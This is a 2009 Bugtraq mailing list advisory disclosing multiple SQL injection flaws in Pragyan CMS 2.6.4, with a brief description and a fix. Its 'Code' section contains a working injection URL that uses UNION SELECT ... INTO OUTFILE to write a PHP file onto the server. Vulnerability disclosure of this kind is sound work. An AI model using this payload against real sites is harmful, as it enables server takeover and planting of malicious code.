Bugtraq mailing list archives
Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Fri, 24 Apr 2009 17:14:55 +0200
******* Salvatore "drosophila" Fresta ******* [+] Application: Pragyan CMS [+] Version: 2.6.4 [+] Website: http://www.pragyan.org [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 22 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx () gmail com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Multiple SQL Injection [-] Risk: hight [-] Requisites: magic_quotes_gpc = off/on This web application is entirely vulnerable to SQL Injection because any variable is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. ************************************************* [+] Code - [A] Multiple SQL Injection http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 ************************************************* [+] Fix You must sanitise any user input. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351
Attachment:
Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities-22042009.txt
Description:
Current thread:
- Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities Salvatore "drosophila" Fresta (Apr 24)